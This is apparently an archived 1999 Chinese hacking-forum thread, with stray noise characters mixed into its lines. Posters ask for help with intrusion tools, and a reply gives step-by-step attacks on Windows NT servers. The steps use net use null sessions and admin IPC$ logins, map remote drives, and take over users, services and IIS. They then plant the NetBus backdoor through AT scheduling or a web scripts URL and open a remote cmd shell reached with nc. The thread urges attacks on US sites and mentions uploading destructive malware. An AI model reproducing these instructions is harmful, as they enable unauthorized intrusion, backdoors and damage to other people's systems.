《版主頁(yè)黑客工具和文章的幾個(gè)問(wèn)題》中提到:
" T E0 @1 L; U/ w9 Q) u, x請(qǐng)教�,從版主頁(yè)上載得PINGER,GRINDER�,LETMEIN等,卻不能用�����,PINGER安裝后��,明明安裝前文件有1M多�,但安裝完后生成的文件夾中只有PINGER��。EXE���,40多K�,運(yùn)行PINGER�,設(shè)置好IP,點(diǎn)PING�,彈出一個(gè)窗口(C++。��。����。)����,說(shuō)出錯(cuò)��,然后關(guān)閉了�����,何故��,是不是安裝有誤����? 2。運(yùn)行LETMEIN�����,彈出以下錯(cuò)誤:連接文件LETMEIN��。EXE到不存在的NETAPI32��。DLL����;NETGROUPGETUSERS��。 是否說(shuō)明需要NETAPI32���。DLL文件,哪里有該DLL����。 3����。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運(yùn)行以下步驟等��,是否要求我的操作系統(tǒng)也是WINNT4����。0 ,應(yīng)該不是吧����? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT�,還是服務(wù)器的操作系統(tǒng)為NT�����? 太多的問(wèn)題需高手回答���,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用,實(shí)在窩囊哦��, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫更多的教學(xué)文章����,以提高我國(guó)黑客水平。' G0 i! e/ c: N+ G1 [
> 我的機(jī)子MMX166���,WIN98�����,2���。5G,32M內(nèi)存�。) @0 } v, C: X* ^
+ d( f' l/ f+ W黑客并不神秘,你只要了解操作系統(tǒng)�,學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn)�����,輔助相關(guān)的工具����,就可以成功�。
# u1 g- ?- N9 l% Z6 `你的問(wèn)題是,pinger, grinder, letmein等工具必須要在NT上運(yùn)行��,我們強(qiáng)烈建議����,你一定要安裝NT�����,對(duì)于你的機(jī)器配制��,和我們現(xiàn)在差不多����,只是比你多了32M內(nèi)存,2G硬盤���。! {2 M6 V) r0 s9 O: B: E# ^
其實(shí)���,攻擊敵站��,利用其操作系統(tǒng)本身的工具就可以了���,比如,我們?cè)贜T上攻擊某服務(wù)器���,該服務(wù)器為NT4.0�����,我們將做如下簡(jiǎn)單事情就有可能成功��,假設(shè)目標(biāo)NT的IP地址為111.111.111.111��,做法如下:
4 {$ T2 Y! w& Pnet use \\111.111.111.111\ipc$ "" /user:""! I* M. P7 j1 _ g. A7 O
net.exe是NT的工具文件���,該命令將和目標(biāo)服務(wù)器建立Null Session,如果成功�����,你可以查看該服務(wù)器上的共享目錄:
' D% L$ R( p, I# m$ n% A' Lnet view \\111.111.111.1111 g7 j) i4 n+ w `/ i" O
當(dāng)然,如果你有該NT管理員密碼��,就更好辦了�����,假設(shè)其管理員Admin密碼為fuck:, c. g6 W0 N. z H$ A6 l
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
1 o, z3 w5 |5 q: v命令成功后��,幾乎所有目標(biāo)NT上的配制�,資源,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來(lái)查看或修改:
{! L, _0 H& ~5 C1 I, w1�����、查看或修改遠(yuǎn)程機(jī)器上的硬盤���,假如目標(biāo)NT上有C、D兩個(gè)硬盤:
9 J7 _9 z2 u* F% jnet use x: \\111.111.111.111\c$
" r+ m: w0 R! L$ unet use y: \\111.111.111.111\d$' p P) P Z, S4 V3 G
這樣�,目標(biāo)NT上的C、D盤分別被影射為你本地的X��、Y盤��,你想怎么做都可以.... D% Y) n7 n9 k
2�、管理目標(biāo)NT的用戶:
$ H6 C4 Y; S: c) u, Y從“開(kāi)始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”5 M* }" }$ e! O5 ?* V8 b
鍵入\\111.111.111.111后�,目標(biāo)NT上的所有用戶你想怎么做都可以��,和管理你本地的一樣, P! @1 E. `( X) l' W
3�、管理目標(biāo)NT的服務(wù)
$ ?7 ?$ ]) j, L選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”
7 v6 X, x: U( ^( ]7 b這樣你可以管理目標(biāo)NT上的服務(wù),共享目錄
5 C9 W2 B( C: E$ e5 L9 N; a4�����、IIS管理# ?; W$ c7 {8 X% o. d9 U
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
0 z! }, K9 w7 a$ G; e8 k目標(biāo)NT的FTP�、WWW服務(wù)你就可以重新配置
4 v, B, M- f4 X, d" Y6 s5、事件管理/ X' j; O' h3 a3 V- |* `2 d
“事件查看器”->連接到服務(wù)器->111.111.111.1113 g5 P9 \3 S) [' M8 `: G+ m
( a8 u/ W- s0 j* g* g) O4 ]/ h) O' x還有更多的東西����,都可以用NT本身的功能來(lái)完成,這些都是95, 98所不能實(shí)現(xiàn)的�����。; Q4 f) u1 U3 _# B8 j" x
3 G' A" m: y- m
當(dāng)然����,98,95也能做一些事情,但很麻煩�����,比如:! b/ E+ r9 g' _& Y/ Z
net use \\111.111.111.111\ipc$) ^+ \2 q+ i9 p4 b
net use z: \\111.111.111.111\d$% ?& Q9 G7 J4 x8 `
但其后不能帶參數(shù),即改用其他用戶或密碼�����,系統(tǒng)將用當(dāng)前用戶和密碼去登錄����,如果你知道目標(biāo)NT的用戶或密碼,重新啟動(dòng)95, 98�,改用該用戶和密碼登錄,方可實(shí)現(xiàn)��,你可以連接目標(biāo)NT上的共享資源��,但不能進(jìn)行管理��,如用戶��、事件等
& B7 X/ K# @. H' G
/ Y j: |8 N: |我們強(qiáng)烈建議各位有心要為死難者報(bào)仇��,真正的想黑霉國(guó)的站點(diǎn)����,花點(diǎn)時(shí)間��,裝個(gè)NT吧,NT Workstation也可以�!7 J/ T) c8 \8 w5 |1 L9 h, w
這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用���!
+ I. O" h! g L' U# V- x" b, E5 {3 J" U; j, |8 b- l5 K+ o3 z
/ p) k8 G' W8 ^, a) q8 t" |0 K
--------------------------------------------------------------------------------$ w+ h2 f$ f5 Z( C5 X, I% {
1 M! {) @1 n4 F8 d>quack于1999-06-12����,23:37:44' Q+ @4 e) i6 x4 y
在大作《幾個(gè)有關(guān)黑的問(wèn)題》中提到:7 l% f/ p' F' ~5 o7 z( n+ p. T
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒(méi)有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無(wú)此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無(wú)機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無(wú)法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無(wú)效,假定上傳其它"有益"美國(guó)NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國(guó)機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國(guó)鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說(shuō)一句,我還真干掉了幾個(gè)美國(guó)人,哈!����。
" d$ e" P! [ i& Y2 |+ E* r2 H( ?/ T3 o& W# t; y( L
killusa于1999-06-13,03:25:15
1 E# ?1 }9 N% P |" W) l# H在大作《Re: 幾個(gè)有關(guān)黑的問(wèn)題》中提到:. J' c. o0 K$ P+ T1 G, T9 o! \
$ O$ |: ?! `& b3 U; `( [( f
letmein.exe 暫時(shí)沒(méi)有mypwd參數(shù)����,十分抱歉
2 P$ D. E" _ j6 [+ V' [0 m1 l" spinger程序,只是利用ping來(lái)尋找主機(jī)����,每臺(tái)NT服務(wù)器有一個(gè)主IP地址,但也可以設(shè)置多個(gè)輔助IP地址����,比如有些服務(wù)器供應(yīng)商,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址�,就是該主機(jī)的主IP地址,所以有時(shí)顯示只有IP�,而無(wú)主機(jī)名。另外�����,有些服務(wù)器是非NT的操作系統(tǒng)��,有時(shí)將不會(huì)顯示主機(jī)名���。當(dāng)然�,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置�����,也會(huì)出現(xiàn)上面的情況�。
, s& g, d' q. b) p3 m' l
" i* ]; S8 D0 {% INetbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序,所以��,netbus.exe是不用上傳的�,只需在目的; E+ Y, N- I, v: v+ E
服務(wù)器上運(yùn)行ntsrv.exe,而在目的服務(wù)器運(yùn)行該程序有很多種方法:; R0 }8 F. }+ F9 ?* U
3 e3 g- S' c f1 R: T2 f" M. s6 B
1�、利用服務(wù)器的 Schedule 服務(wù)來(lái)啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序�,具體使用方法���,可在自己的NT Dos窗口下鍵入以下:
3 t7 L( h* L. ?! M
3 ?6 A* i4 [+ TC:\>net start schedule
" l6 J2 g2 G+ I* j; g9 eSchedule 正在啟動(dòng)服務(wù).....
* E1 c, Y2 ~0 C6 P: D+ Q/ R& nSchedulw 服務(wù)啟動(dòng)成功。
( g9 q" h" w+ ^' ]' L9 rC:\>at /?3 b7 F0 w0 w5 [* G' x" L
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序����。
8 C& u: n" H0 p: M運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)。# I+ w# D4 h! a4 N( O
6 d- \, o5 j$ z8 }
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]] n9 b& \3 t$ ]) J; ]+ v8 l) a4 E
AT [\\computername] time [/INTERACTIVE]
% b7 Z3 E, h" }1 `! @/ ~[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
+ [6 i! h' n- r/ G+ m7 X3 o Y. \ b/ M$ h( v& U0 U
\\computername 指定遠(yuǎn)程計(jì)算機(jī)�。 如果省略這個(gè)參數(shù); B: v; z, p7 n" k ?2 s
命令會(huì)被排定在本機(jī)上運(yùn)行。
" } a( J* ~: A: Z* v4 u5 iid 指定給排定進(jìn)度命令的識(shí)別號(hào)�����。
5 }: q0 [1 X# C1 Y) o$ ]! w3 z" F4 Z9 c# e
/delete 刪除某個(gè)已排定進(jìn)度的命令��。如果省略標(biāo)識(shí)����,計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除。/ r# R, `' h u
/yes 用于刪除所有作業(yè)���,且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 �。
( I4 Q* Q% ^: V5 D+ {7 _time 指定命令運(yùn)行的時(shí)間�。: o6 B) f* l: N6 M7 P; O
/interactive 允許作業(yè)在運(yùn)行時(shí)��,與用戶通過(guò)桌面交互�。2 U1 ]( x- p" ^6 O& A& w; ~
/ K D5 _: S/ r0 c& G7 P/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令���。6 H" P9 ~0 ~; J7 ^ U! f
如果省略日期�����,則默認(rèn)為在每月的本日運(yùn)行��。
, b( A- E- f; G5 K/ |" d6 ?7 r5 F6 W- [8 i6 N4 U: S2 H
/next:date[,...] 指定在下一個(gè)指定日期 (如����,下周三)�,運(yùn)行命令。如果省略日期�����,則默認(rèn)為在每月的本日運(yùn)行���。( J9 ~+ w& n. i- z8 y5 u- i4 X
7 E; T! A4 f: }) p+ V
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件�。9 ?8 K1 M' q4 R6 O0 q
6 }- c7 N' A7 D1 x" O% QC:\>
3 ~( S1 T- E4 x8 u; A' L. f* e- |$ F! I& Y
知道了如何使用AT����,再來(lái)看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:+ K T3 \" ~7 {1 O; Q- o
1 利用管理員登陸到目的服務(wù)器����,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser", F. h5 r$ o/ u6 E& Y
2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start4 [- m3 |. v G+ H; x
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行�,當(dāng)然最快運(yùn)行最理想���,所以���,你可以用letmein.exe得到服務(wù)器的時(shí)間,然后:$ Z/ d9 O' w: J# @% F# t- T. }# m: `
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
* r) @ H9 u. Q! T3 L5 `其中00:00要改為用letmein.exe得回來(lái)的具體時(shí)間+一點(diǎn)容量���,等一會(huì)后�����,再在本地啟動(dòng)netbus.exe�,鍵入目的服務(wù)器得ip地址或hostname���,連接�!具體使用可參照 "How to get in nt"�����,比如第一種方法,你想要在目的服務(wù)器運(yùn)行 LEGION��,可以利用netbus得上傳功能�����,將LEGION上傳至目的服務(wù)器���,再用netbus的"Start program"�����,鍵入完整路徑的LEGION運(yùn)行程序���,就ok了!第二種方法是利用netbus的“App redirect”功能�,啟動(dòng)遠(yuǎn)程telnet服務(wù),如下:在netbus中擊“App redirect”�����,鍵入"C:\>winnt\system32\cmd.exe"�,Port為:4321���,服務(wù)就啟動(dòng)了,然后在本地運(yùn)行:nc x.x.x.x 4321�,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功:
: k* w6 w7 q, b$ k- b/ LMicrosoft(R) Windows NT(TM)& s! O3 v7 ~/ E( P% v2 a0 r
(C) Copyright 1985-1996 Microsoft Corp.) V }5 d& I1 {6 z5 u0 ~0 u
C:\>/ s. Y- l. Y1 s7 C$ T
. v. p1 d" c" S4 I7 v) _% [& \6 i2、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器# ]6 S- t) X. S( l, i, P) Y" p0 }
" {$ O: ~0 H" F
將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄�,如cgi-bin或scripts,然后在瀏覽器鍵入url如:
* O E+ S+ M# @, V( L: O( C; Hhttp://x.x.x.x/scripts/ntsrv.exe /port:643212 \, j9 k3 S2 j" p. j! g: B1 V; X
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
( k: T, l) a- ^( h. w# Y' \該程序就啟動(dòng)了% L, `, K4 Z8 D; ]4 U
$ U& B1 E) k; {# r
我只提這幾中方法���!# ], k& I8 z- Z" N: y* o# v' f/ I
要成功,必須打好基礎(chǔ)工�,對(duì)操作系統(tǒng)充分了解!
( F: V# j9 ?8 r5 p' Y& U/ y8 ?5 K4 E7 c; V) W7 |- f+ Q) q
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡